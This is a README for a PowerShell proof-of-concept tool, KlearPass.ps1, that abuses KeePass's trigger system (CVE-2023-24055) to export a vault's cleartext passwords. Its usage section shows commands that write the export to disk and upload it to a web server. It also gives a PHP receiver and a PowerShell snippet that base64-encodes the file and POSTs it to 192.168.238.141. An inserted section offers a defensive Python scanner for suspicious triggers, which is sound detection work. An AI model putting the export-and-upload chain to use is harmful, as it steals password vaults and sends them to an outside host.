This script is for educational and demonstration purposes only. The author does not endorse or condone the use of this script for any criminal or malicious activities, and it should only be used where explicitly allowed with proper permission.
This script should be used with caution, as it will alter the KeePass configuration file and delete any previously configured triggers. Use of this script may result in unexpected behavior and potentially break the KeePass application. Use at your own risk.
This script demonstrates the **DISPUTED** vulnerability CVE-2023-24055 in KeePass through version 2.53 (in a default installation): an attacker with write access to the XML configuration file can obtain the cleartext passwords by adding an export trigger. Note that the vendor's position is that the password database is not intended to be secure against an attacker who already has that level of access to the local PC.

References:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
- https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
- https://keepass.info/
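For the defensive side of the same mechanism, the following is an added example (not part of this script or of KeePass): a small scanner that reads a `KeePass.config.xml`, lists every configured trigger and flags those whose actions carry a file path, UNC path or URL parameter or name an export format, which is exactly what the export trigger described above looks like in the config. The XML layout (`Application/TriggerSystem/Triggers/Trigger` with `Events`, `Conditions` and `Actions`) follows what KeePass writes; the sample config below is constructed and its GUID values are placeholders, not real KeePass type identifiers.

```python
"""Detection aid: list and triage triggers configured in a KeePass.config.xml.

Any trigger whose action parameters point at a path or URL, or name an export
format, is reported as suspicious; that is the shape of an export trigger.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample (not a real capture): one trigger that exports the open
# database to a file. GUID values are placeholders, not real KeePass type IDs.
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Guid>PLACEHOLDER-TRIGGER-GUID=</Guid>
          <Name>Sync</Name>
          <Enabled>true</Enabled>
          <Events>
            <Event>
              <TypeGuid>PLACEHOLDER-EVENT-TYPE=</TypeGuid>
              <Parameters />
            </Event>
          </Events>
          <Conditions />
          <Actions>
            <Action>
              <TypeGuid>PLACEHOLDER-ACTION-TYPE=</TypeGuid>
              <Parameters>
                <Parameter>c:\windows\tasks\export.txt</Parameter>
                <Parameter>KeePass XML (2.x)</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>
"""

# A parameter that is a local path, UNC share or URL means the action writes
# data somewhere or contacts something off-host.
_LOCATION_RE = re.compile(r"^(?:[a-zA-Z]:\\|\\\\|/|https?://)", re.IGNORECASE)
_EXPORT_RE = re.compile(r"KeePass XML|CSV|export", re.IGNORECASE)


@dataclass
class TriggerInfo:
    name: str
    enabled: bool
    actions: list = field(default_factory=list)   # [(type_guid, [params])]
    reasons: list = field(default_factory=list)   # why it was flagged


def _is_true(text):
    return (text or "").strip().lower() == "true"


def parse_triggers(xml_text):
    """Return every <Trigger> under Application/TriggerSystem/Triggers."""
    root = ET.fromstring(xml_text)
    found = []
    for trig in root.findall("./Application/TriggerSystem/Triggers/Trigger"):
        info = TriggerInfo(
            name=trig.findtext("Name", default="<unnamed>"),
            enabled=_is_true(trig.findtext("Enabled", default="true")),
        )
        for action in trig.findall("./Actions/Action"):
            params = [p.text or "" for p in action.findall("./Parameters/Parameter")]
            info.actions.append((action.findtext("TypeGuid", default=""), params))
        found.append(info)
    return found


def triage(trigger):
    """Fill trigger.reasons; return True if the trigger looks suspicious."""
    trigger.reasons = []
    for type_guid, params in trigger.actions:
        for p in params:
            if _LOCATION_RE.match(p.strip()):
                trigger.reasons.append(f"action {type_guid or '?'} targets location {p!r}")
            if _EXPORT_RE.search(p):
                trigger.reasons.append(f"action {type_guid or '?'} names an export format/operation: {p!r}")
    return bool(trigger.reasons)


def scan(xml_text):
    """Scan one config; return trigger-system state plus flagged triggers."""
    root = ET.fromstring(xml_text)
    enabled = _is_true(root.findtext("./Application/TriggerSystem/Enabled", default="true"))
    triggers = parse_triggers(xml_text)
    suspicious = [t for t in triggers if triage(t)]
    return {"trigger_system_enabled": enabled, "triggers": triggers, "suspicious": suspicious}


if __name__ == "__main__":
    import sys
    # KeePass writes the config with a BOM, so read it as utf-8-sig.
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    result = scan(text)
    print(f"trigger system enabled: {result['trigger_system_enabled']}")
    print(f"triggers configured: {len(result['triggers'])}")
    for t in result["suspicious"]:
        state = "enabled" if t.enabled else "disabled"
        print(f"SUSPICIOUS trigger {t.name!r} ({state}):")
        for r in t.reasons:
            print("  -", r)
```

Run it as `python scan_triggers.py "%APPDATA%\KeePass\KeePass.config.xml"` (the script name is this example's, not the project's) or with no argument to see the constructed sample flagged. In a managed deployment the baseline is usually "no triggers at all", enforced through KeePass's `KeePass.config.enforced.xml`, so any trigger the scanner reports from a user's config is worth a look regardless of the heuristics.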
To use this script, run it in PowerShell and provide the necessary parameters. The mandatory parameter is:

- `-filename`: The full file path and name of the file to which the passwords are exported.

The optional parameters are:

- `-uploadURL`: This switch specifies that the data should be uploaded to the specified URL.
- `-url`: The URL to which the data should be uploaded.
Export cleartext passwords:

```powershell
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt
```

Export cleartext passwords and upload the export to a web server:

```powershell
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php
```

Detailed help:

```powershell
Get-Help .\KlearPass.ps1 -Detailed
```
Example `upload.php` receiver on the web server:

```php
<?php
// Expects the POST fields "filename" and "data" (base64-encoded file content).
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    // basename() keeps the written file inside the uploads directory.
    $filename = $target_directory . basename($_POST['filename']);
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>
```
Upload snippet:

```powershell
$filename = "c:\windows\tasks\export.txt";
# Only the bare file name is sent as the "filename" form field.
$file = [System.IO.Path]::GetFileName($filename);
# The file content is base64-encoded before being placed in the form body.
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");
```
- Script initially based on code found in https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
- The idea of exfiltrating the export is credited to https://github.com/alt3kx/CVE-2023-24055_PoC.